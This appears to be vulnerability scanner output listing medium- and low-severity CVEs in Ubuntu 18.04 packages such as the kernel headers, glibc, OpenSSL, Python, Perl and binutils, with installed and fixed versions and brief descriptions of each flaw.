Medium CVE-2021-42739 linux-libc-dev 4.15.0-24.264.15.0-167.175kernel: Heap buffer overflow in firedtv driver linux-libc-dev:4.15.0-24.26
Medium CVE-2021-43975 linux-libc-dev 4.15.0-24.264.15.0-176.185kernel: out-of-bounds write in hw_atl_utils_fw_rpc_wait() in drivers/net/ethernet/aquantia/atlantic/hw_atl/hw_atl_utils.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-44733 linux-libc-dev 4.15.0-24.264.15.0-173.182kernel: use-after-free in the TEE subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45095 linux-libc-dev 4.15.0-24.264.15.0-173.182kernel: refcount leak in pep_sock_accept() in net/phonet/pep.c linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45469 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: out-of-bounds memory access in __f2fs_setxattr() in fs/f2fs/xattr.c when an inode has an invalid last xattr entry linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45485 linux-libc-dev 4.15.0-24.264.15.0-156.163kernel: information leak in the IPv6 implementation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45486 linux-libc-dev 4.15.0-24.264.15.0-156.163kernel: information leak in the IPv4 implementation linux-libc-dev:4.15.0-24.26
Medium CVE-2021-45868 linux-libc-dev 4.15.0-24.264.15.0-167.175kernel: fs/quota/quota_tree.c does not validate the block number in the quota tree linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0322 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0330 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: possible privileges escalation due to missing TLB flush linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0435 linux-libc-dev 4.15.0-24.264.15.0-173.182kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0487 linux-libc-dev 4.15.0-24.264.15.0-177.186kernel: Use after free in moxart_remove linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0644 linux-libc-dev 4.15.0-24.264.15.0-166.174kernel: Assertion failure can happen if users trigger kernel_read_file_from_fd() linux-libc-dev:4.15.0-24.26
Medium CVE-2022-0850 linux-libc-dev 4.15.0-24.264.15.0-156.163kernel: information leak in copy_page_to_iter() in iov_iter.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1011 linux-libc-dev 4.15.0-24.264.15.0-189.200kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1016 linux-libc-dev 4.15.0-24.264.15.0-184.194kernel: uninitialized registers on stack in nft_do_chain can cause kernel pointer leakage to UM linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1198 linux-libc-dev 4.15.0-24.264.15.0-189.200kernel: use-after-free in drivers/net/hamradio/6pack.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1199 linux-libc-dev 4.15.0-24.264.15.0-189.200kernel: Null pointer dereference and use after free in ax25_release() linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1204 linux-libc-dev 4.15.0-24.264.15.0-189.200kernel: Use after free in net/ax25/af_ax25.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1205 linux-libc-dev 4.15.0-24.264.15.0-189.200kernel: Null pointer dereference and use after free in net/ax25/ax25_timer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1353 linux-libc-dev 4.15.0-24.264.15.0-189.200Kernel: A kernel-info-leak issue in pfkey_register linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1419 linux-libc-dev 4.15.0-24.264.15.0-184.194kernel: a concurrency use-after-free in vgem_gem_dumb_create linux-libc-dev:4.15.0-24.26
Medium CVE-2022-1516 linux-libc-dev 4.15.0-24.264.15.0-189.200kernel: null-ptr-deref caused by x25_disconnect linux-libc-dev:4.15.0-24.26
Medium CVE-2022-20009 linux-libc-dev 4.15.0-24.264.15.0-177.186In various functions of the USB gadget subsystem, there is a possible out of bounds write due to a missing bounds check linux-libc-dev:4.15.0-24.26
Medium CVE-2022-21123 linux-libc-dev 4.15.0-24.264.15.0-187.198hw: cpu: Incomplete cleanup of multi-core shared buffers (aka SBDR) linux-libc-dev:4.15.0-24.26
Medium CVE-2022-21125 linux-libc-dev 4.15.0-24.264.15.0-187.198hw: cpu: Incomplete cleanup of microarchitectural fill buffers (aka SBDS) linux-libc-dev:4.15.0-24.26
Medium CVE-2022-21166 linux-libc-dev 4.15.0-24.264.15.0-187.198hw: cpu: Incomplete cleanup in specific special register write operations (aka DRPW) linux-libc-dev:4.15.0-24.26
Medium CVE-2022-22942 linux-libc-dev 4.15.0-24.264.15.0-169.177kernel: failing usercopy allows for use-after-free exploitation linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23036 linux-libc-dev 4.15.0-24.264.15.0-177.186Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23037 linux-libc-dev 4.15.0-24.264.15.0-177.186Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23038 linux-libc-dev 4.15.0-24.264.15.0-177.186Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23039 linux-libc-dev 4.15.0-24.264.15.0-177.186Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23040 linux-libc-dev 4.15.0-24.264.15.0-177.186Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-23042 linux-libc-dev 4.15.0-24.264.15.0-177.186Linux PV device frontends vulnerable to attacks by backends T[his CNA ... linux-libc-dev:4.15.0-24.26
Medium CVE-2022-24448 linux-libc-dev 4.15.0-24.264.15.0-176.185kernel: nfs_atomic_open() returns uninitialized data instead of ENOTDIR linux-libc-dev:4.15.0-24.26
Medium CVE-2022-24958 linux-libc-dev 4.15.0-24.264.15.0-177.186kernel: use-after-free in dev->buf release in drivers/usb/gadget/legacy/inode.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-25258 linux-libc-dev 4.15.0-24.264.15.0-177.186kernel: security issues in the OS descriptor handling section of composite_setup function (composite.c) linux-libc-dev:4.15.0-24.26
Medium CVE-2022-25375 linux-libc-dev 4.15.0-24.264.15.0-177.186kernel: information disclosure in drivers/usb/gadget/function/rndis.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-26490 linux-libc-dev 4.15.0-24.264.15.0-177.186kernel: potential buffer overflows in EVT_TRANSACTION in st21nfca linux-libc-dev:4.15.0-24.26
Medium CVE-2022-26966 linux-libc-dev 4.15.0-24.264.15.0-177.186kernel: heap memory leak in drivers/net/usb/sr9700.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-27666 linux-libc-dev 4.15.0-24.264.15.0-175.184kernel: buffer overflow in IPsec ESP transformation code linux-libc-dev:4.15.0-24.26
Medium CVE-2022-28388 linux-libc-dev 4.15.0-24.264.15.0-188.199kernel: a double free in usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-28389 linux-libc-dev 4.15.0-24.264.15.0-189.200kernel: a double free in mcba_usb_start_xmit in drivers/net/can/usb/mcba_usb.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-28390 linux-libc-dev 4.15.0-24.264.15.0-184.194kernel: a double free in ems_usb_start_xmit in drivers/net/can/usb/ems_usb.c linux-libc-dev:4.15.0-24.26
Medium CVE-2022-30594 linux-libc-dev 4.15.0-24.264.15.0-180.189kernel: mishandled seccomp permissions linux-libc-dev:4.15.0-24.26
Medium CVE-2022-32250 linux-libc-dev 4.15.0-24.264.15.0-184.194kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root linux-libc-dev:4.15.0-24.26
Medium CVE-2018-11236 multiarch-support 2.27-3ubuntu12.27-3ubuntu1.2glibc: Integer overflow in stdlib/canonicalize.c on 32-bit architectures leading to stack-based buffer overflow multiarch-support:2.27-3ubuntu1
Medium CVE-2018-11237 multiarch-support 2.27-3ubuntu12.27-3ubuntu1.2glibc: Buffer overflow in __mempcpy_avx512_no_vzeroupper multiarch-support:2.27-3ubuntu1
Medium CVE-2018-19591 multiarch-support 2.27-3ubuntu12.27-3ubuntu1.2glibc: file descriptor leak in if_nametoindex() in sysdeps/unix/sysv/linux/if_index.c multiarch-support:2.27-3ubuntu1
Medium CVE-2020-1751 multiarch-support 2.27-3ubuntu12.27-3ubuntu1.2glibc: array overflow in backtrace functions for powerpc multiarch-support:2.27-3ubuntu1
Medium CVE-2021-3999 multiarch-support 2.27-3ubuntu12.27-3ubuntu1.5glibc: Off-by-one buffer overflow/underflow in getcwd() multiarch-support:2.27-3ubuntu1
Medium CVE-2021-20305 nettle-dev 3.4-13.4-1ubuntu0.1nettle: Out of bounds memory access in signature verification nettle-dev:3.4-1
Medium CVE-2021-3580 nettle-dev 3.4-13.4.1-0ubuntu0.18.04.1nettle: Remote crash in RSA decryption via manipulated ciphertext nettle-dev:3.4-1
Medium CVE-2018-20685 openssh-client 1:7.6p1-41:7.6p1-4ubuntu0.2openssh: scp client improper directory name validation openssh-client:1:7.6p1-4
Medium CVE-2019-6109 openssh-client 1:7.6p1-41:7.6p1-4ubuntu0.2openssh: Missing character encoding in progress display allows for spoofing of scp client output openssh-client:1:7.6p1-4
Medium CVE-2021-23841 openssl 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.8openssl: NULL pointer dereference in X509_issuer_and_serial_hash() openssl:1.1.0g-2ubuntu4.1
Medium CVE-2021-3712 openssl 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.13openssl: Read buffer overruns processing ASN.1 strings openssl:1.1.0g-2ubuntu4.1
Medium CVE-2022-1292 openssl 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.17openssl: c_rehash script allows command injection openssl:1.1.0g-2ubuntu4.1
Medium CVE-2022-2068 openssl 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.19openssl: the c_rehash script allows command injection openssl:1.1.0g-2ubuntu4.1
Medium CVE-2022-2097 openssl 1.1.0g-2ubuntu4.11.1.1-1ubuntu2.1~18.04.20openssl: AES OCB fails to encrypt some bytes openssl:1.1.0g-2ubuntu4.1
Medium CVE-2018-20969 patch 2.7.6-2ubuntu12.7.6-2ubuntu1.1patch: do_ed_script in pch.c does not block strings beginning with a ! character patch:2.7.6-2ubuntu1
Medium CVE-2019-13636 patch 2.7.6-2ubuntu12.7.6-2ubuntu1.1patch: the following of symlinks in inp.c and util.c is mishandled in cases other than input files patch:2.7.6-2ubuntu1
Medium CVE-2019-13638 patch 2.7.6-2ubuntu12.7.6-2ubuntu1.1patch: OS shell command injection when processing crafted patch files patch:2.7.6-2ubuntu1
Medium CVE-2018-18311 perl 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Integer overflow leading to buffer overflow in Perl_my_setenv() perl:5.26.1-6ubuntu0.1
Medium CVE-2018-18312 perl 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer overflow in S_handle_regex_sets() perl:5.26.1-6ubuntu0.1
Medium CVE-2018-18313 perl 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer read overflow in S_grok_bslash_N() perl:5.26.1-6ubuntu0.1
Medium CVE-2018-18314 perl 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer overflow in S_regatom() perl:5.26.1-6ubuntu0.1
Medium CVE-2018-18311 perl-base 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Integer overflow leading to buffer overflow in Perl_my_setenv() perl-base:5.26.1-6ubuntu0.1
Medium CVE-2018-18312 perl-base 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer overflow in S_handle_regex_sets() perl-base:5.26.1-6ubuntu0.1
Medium CVE-2018-18313 perl-base 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer read overflow in S_grok_bslash_N() perl-base:5.26.1-6ubuntu0.1
Medium CVE-2018-18314 perl-base 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer overflow in S_regatom() perl-base:5.26.1-6ubuntu0.1
Medium CVE-2018-18311 perl-modules-5.26 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Integer overflow leading to buffer overflow in Perl_my_setenv() perl-modules-5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18312 perl-modules-5.26 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer overflow in S_handle_regex_sets() perl-modules-5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18313 perl-modules-5.26 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer read overflow in S_grok_bslash_N() perl-modules-5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-18314 perl-modules-5.26 5.26.1-6ubuntu0.15.26.1-6ubuntu0.3perl: Heap-based buffer overflow in S_regatom() perl-modules-5.26:5.26.1-6ubuntu0.1
Medium CVE-2018-1000802 python2.7 2.7.15~rc1-12.7.15~rc1-1ubuntu0.1python: Command injection in the shutil module python2.7:2.7.15~rc1-1
Medium CVE-2018-14647 python2.7 2.7.15~rc1-12.7.15~rc1-1ubuntu0.1python: Missing salt initialization in _elementtree.c module python2.7:2.7.15~rc1-1
Medium CVE-2018-20852 python2.7 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Cookie domain check returns incorrect results python2.7:2.7.15~rc1-1
Medium CVE-2019-10160 python2.7 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc python2.7:2.7.15~rc1-1
Medium CVE-2019-16056 python2.7 2.7.15~rc1-12.7.15-4ubuntu4~18.04.2python: email.utils.parseaddr wrongly parses email addresses python2.7:2.7.15~rc1-1
Medium CVE-2019-18348 python2.7 2.7.15~rc1-12.7.17-1~18.04ubuntu1python: CRLF injection via the host part of the url passed to urlopen() python2.7:2.7.15~rc1-1
Medium CVE-2019-20907 python2.7 2.7.15~rc1-12.7.17-1~18.04ubuntu1.1python: infinite loop in the tarfile module via crafted TAR archive python2.7:2.7.15~rc1-1
Medium CVE-2019-9636 python2.7 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Information Disclosure due to urlsplit improper NFKC normalization python2.7:2.7.15~rc1-1
Medium CVE-2019-9740 python2.7 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: CRLF injection via the query part of the url passed to urlopen() python2.7:2.7.15~rc1-1
Medium CVE-2019-9947 python2.7 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: CRLF injection via the path part of the url passed to urlopen() python2.7:2.7.15~rc1-1
Medium CVE-2019-9948 python2.7 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms python2.7:2.7.15~rc1-1
Medium CVE-2020-26116 python2.7 2.7.15~rc1-12.7.17-1~18.04ubuntu1.2python: CRLF injection via HTTP request method in httplib/http.client python2.7:2.7.15~rc1-1
Medium CVE-2021-3177 python2.7 2.7.15~rc1-12.7.17-1~18.04ubuntu1.6python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c python2.7:2.7.15~rc1-1
Medium CVE-2021-4189 python2.7 2.7.15~rc1-12.7.17-1~18.04ubuntu1.7python: ftplib should not use the host from the PASV response python2.7:2.7.15~rc1-1
Medium CVE-2022-0391 python2.7 2.7.15~rc1-12.7.17-1~18.04ubuntu1.7python: urllib.parse does not sanitize URLs containing ASCII newline and tabs python2.7:2.7.15~rc1-1
Medium CVE-2018-1000802 python2.7-minimal 2.7.15~rc1-12.7.15~rc1-1ubuntu0.1python: Command injection in the shutil module python2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-14647 python2.7-minimal 2.7.15~rc1-12.7.15~rc1-1ubuntu0.1python: Missing salt initialization in _elementtree.c module python2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-20852 python2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Cookie domain check returns incorrect results python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-10160 python2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-16056 python2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.2python: email.utils.parseaddr wrongly parses email addresses python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-18348 python2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1python: CRLF injection via the host part of the url passed to urlopen() python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-20907 python2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.1python: infinite loop in the tarfile module via crafted TAR archive python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9636 python2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Information Disclosure due to urlsplit improper NFKC normalization python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9740 python2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: CRLF injection via the query part of the url passed to urlopen() python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9947 python2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: CRLF injection via the path part of the url passed to urlopen() python2.7-minimal:2.7.15~rc1-1
Medium CVE-2019-9948 python2.7-minimal 2.7.15~rc1-12.7.15-4ubuntu4~18.04.1python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms python2.7-minimal:2.7.15~rc1-1
Medium CVE-2020-26116 python2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.2python: CRLF injection via HTTP request method in httplib/http.client python2.7-minimal:2.7.15~rc1-1
Medium CVE-2021-3177 python2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.6python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c python2.7-minimal:2.7.15~rc1-1
Medium CVE-2021-4189 python2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.7python: ftplib should not use the host from the PASV response python2.7-minimal:2.7.15~rc1-1
Medium CVE-2022-0391 python2.7-minimal 2.7.15~rc1-12.7.17-1~18.04ubuntu1.7python: urllib.parse does not sanitize URLs containing ASCII newline and tabs python2.7-minimal:2.7.15~rc1-1
Medium CVE-2018-14647 python3.6 3.6.5-33.6.7-1~18.04python: Missing salt initialization in _elementtree.c module python3.6:3.6.5-3
Medium CVE-2018-20852 python3.6 3.6.5-33.6.8-1~18.04.2python: Cookie domain check returns incorrect results python3.6:3.6.5-3
Medium CVE-2019-10160 python3.6 3.6.5-33.6.8-1~18.04.2python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc python3.6:3.6.5-3
Medium CVE-2019-16056 python3.6 3.6.5-33.6.8-1~18.04.3python: email.utils.parseaddr wrongly parses email addresses python3.6:3.6.5-3
Medium CVE-2019-18348 python3.6 3.6.5-33.6.9-1~18.04ubuntu1python: CRLF injection via the host part of the url passed to urlopen() python3.6:3.6.5-3
Medium CVE-2019-20907 python3.6 3.6.5-33.6.9-1~18.04ubuntu1.1python: infinite loop in the tarfile module via crafted TAR archive python3.6:3.6.5-3
Medium CVE-2019-9636 python3.6 3.6.5-33.6.8-1~18.04.2python: Information Disclosure due to urlsplit improper NFKC normalization python3.6:3.6.5-3
Medium CVE-2019-9740 python3.6 3.6.5-33.6.8-1~18.04.2python: CRLF injection via the query part of the url passed to urlopen() python3.6:3.6.5-3
Medium CVE-2019-9947 python3.6 3.6.5-33.6.8-1~18.04.2python: CRLF injection via the path part of the url passed to urlopen() python3.6:3.6.5-3
Medium CVE-2019-9948 python3.6 3.6.5-33.6.8-1~18.04.2python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms python3.6:3.6.5-3
Medium CVE-2020-26116 python3.6 3.6.5-33.6.9-1~18.04ubuntu1.3python: CRLF injection via HTTP request method in httplib/http.client python3.6:3.6.5-3
Medium CVE-2021-3177 python3.6 3.6.5-33.6.9-1~18.04ubuntu1.4python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c python3.6:3.6.5-3
Medium CVE-2021-3733 python3.6 3.6.5-33.6.9-1~18.04ubuntu1.6python: urllib: Regular expression DoS in AbstractBasicAuthHandler python3.6:3.6.5-3
Medium CVE-2021-3737 python3.6 3.6.5-33.6.9-1~18.04ubuntu1.6python: urllib: HTTP client possible infinite loop on a 100 Continue response python3.6:3.6.5-3
Medium CVE-2021-4189 python3.6 3.6.5-33.6.9-1~18.04ubuntu1.7python: ftplib should not use the host from the PASV response python3.6:3.6.5-3
Medium CVE-2022-0391 python3.6 3.6.5-33.6.9-1~18.04ubuntu1.7python: urllib.parse does not sanitize URLs containing ASCII newline and tabs python3.6:3.6.5-3
Medium CVE-2018-14647 python3.6-minimal 3.6.5-33.6.7-1~18.04python: Missing salt initialization in _elementtree.c module python3.6-minimal:3.6.5-3
Medium CVE-2018-20852 python3.6-minimal 3.6.5-33.6.8-1~18.04.2python: Cookie domain check returns incorrect results python3.6-minimal:3.6.5-3
Medium CVE-2019-10160 python3.6-minimal 3.6.5-33.6.8-1~18.04.2python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc python3.6-minimal:3.6.5-3
Medium CVE-2019-16056 python3.6-minimal 3.6.5-33.6.8-1~18.04.3python: email.utils.parseaddr wrongly parses email addresses python3.6-minimal:3.6.5-3
Medium CVE-2019-18348 python3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1python: CRLF injection via the host part of the url passed to urlopen() python3.6-minimal:3.6.5-3
Medium CVE-2019-20907 python3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.1python: infinite loop in the tarfile module via crafted TAR archive python3.6-minimal:3.6.5-3
Medium CVE-2019-9636 python3.6-minimal 3.6.5-33.6.8-1~18.04.2python: Information Disclosure due to urlsplit improper NFKC normalization python3.6-minimal:3.6.5-3
Medium CVE-2019-9740 python3.6-minimal 3.6.5-33.6.8-1~18.04.2python: CRLF injection via the query part of the url passed to urlopen() python3.6-minimal:3.6.5-3
Medium CVE-2019-9947 python3.6-minimal 3.6.5-33.6.8-1~18.04.2python: CRLF injection via the path part of the url passed to urlopen() python3.6-minimal:3.6.5-3
Medium CVE-2019-9948 python3.6-minimal 3.6.5-33.6.8-1~18.04.2python: Undocumented local_file protocol allows remote attackers to bypass protection mechanisms python3.6-minimal:3.6.5-3
Medium CVE-2020-26116 python3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.3python: CRLF injection via HTTP request method in httplib/http.client python3.6-minimal:3.6.5-3
Medium CVE-2021-3177 python3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.4python: Stack-based buffer overflow in PyCArg_repr in _ctypes/callproc.c python3.6-minimal:3.6.5-3
Medium CVE-2021-3733 python3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.6python: urllib: Regular expression DoS in AbstractBasicAuthHandler python3.6-minimal:3.6.5-3
Medium CVE-2021-3737 python3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.6python: urllib: HTTP client possible infinite loop on a 100 Continue response python3.6-minimal:3.6.5-3
Medium CVE-2021-4189 python3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.7python: ftplib should not use the host from the PASV response python3.6-minimal:3.6.5-3
Medium CVE-2022-0391 python3.6-minimal 3.6.5-33.6.9-1~18.04ubuntu1.7python: urllib.parse does not sanitize URLs containing ASCII newline and tabs python3.6-minimal:3.6.5-3
Medium CVE-2022-1271 xz-utils 5.2.2-1.35.2.2-1.3ubuntu0.1gzip: arbitrary-file-write vulnerability xz-utils:5.2.2-1.3
Medium CVE-2018-25032 zlib1g 1:1.2.11.dfsg-0ubuntu21:1.2.11.dfsg-0ubuntu2.1zlib: A flaw found in zlib when compressing (not decompressing) certain inputs zlib1g:1:1.2.11.dfsg-0ubuntu2
Medium CVE-2018-25032 zlib1g-dev 1:1.2.11.dfsg-0ubuntu21:1.2.11.dfsg-0ubuntu2.1zlib: A flaw found in zlib when compressing (not decompressing) certain inputs zlib1g-dev:1:1.2.11.dfsg-0ubuntu2
Medium CVE-2021-23362 hosted-git-info 2.6.02.8.9, 3.0.8nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() hosted-git-info:2.6.0
Medium CVE-2020-28481 socket.io 1.7.42.4.0Insecure defaults due to CORS misconfiguration in socket.io socket.io:1.7.4
Low CVE-2018-6557 base-files 10.1ubuntu210.1ubuntu2.2The MOTD update script in the base-files package in Ubuntu 18.04 LTS before 10.1ubuntu2.2, and Ubuntu 18.10 before 10.1ubuntu6 incorrectly handled... base-files:10.1ubuntu2
Low CVE-2019-18276 bash 4.4.18-2ubuntu14.4.18-2ubuntu1.3bash: when effective UID is not equal to its real UID the saved UID is not dropped bash:4.4.18-2ubuntu1
Low CVE-2018-1000876 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: integer overflow leads to heap-based buffer overflow in objdump binutils:2.30-20ubuntu2~18.04
Low CVE-2018-10372 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Heap-base buffer over-read in dwarf.c:process_cu_tu_index() allows for denial of service via crafted file binutils:2.30-20ubuntu2~18.04
Low CVE-2018-10373 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in dwarf2.c:concat_filename() allows for denial of service via crafted file binutils:2.30-20ubuntu2~18.04
Low CVE-2018-10534 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: out of bounds memory write in peXXigen.c files binutils:2.30-20ubuntu2~18.04
Low CVE-2018-10535 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in elf.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12641 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack Exhaustion in the demangling functions provided by libiberty binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12697 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in work_stuff_copy_to_from in cplus-dem.c. binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12698 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: excessive memory consumption in demangle_template in cplus-dem.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12699 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer overflow in finish_stab in stabs.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-12934 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Uncontrolled Resource Consumption in remember_Ktype in cplus-dem.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-13033 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Uncontrolled Resource Consumption in execution of nm binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17358 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: invalid memory access in _bfd_stab_section_find_nearest_line in syms.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17359 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: invalid memory access in bfd_zalloc in opncls.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17360 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer over-read in bfd_getl32 in libbfd.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17794 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in libiberty/cplus-dem.c:work_stuff_copy_to_from() via crafted input binutils:2.30-20ubuntu2~18.04
Low CVE-2018-17985 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack consumption problem caused by the cplus_demangle_type binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18309 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: invalid memory address dereference in read_reloc in reloc.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18483 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Integer overflow in cplus-dem.c:get_count() allows for denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18484 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Stack exhaustion in cp-demangle.c allows for denial of service binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18605 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: heap-based buffer over-read in sec_merge_hash_lookup in merge.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18606 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in _bfd_add_merge_section in merge_strings function in merge.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18607 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: NULL pointer dereference in elf_link_input_bfd in elflink.c binutils:2.30-20ubuntu2~18.04
Low CVE-2018-18700 binutils 2.30-20ubuntu2~18.042.30-21ubuntu1~18.04.3binutils: Recursive Stack Overflow within function d_name, d_encoding, and d_local_name in cp-demangle.c binutils:2.30-20ubuntu2~18.04
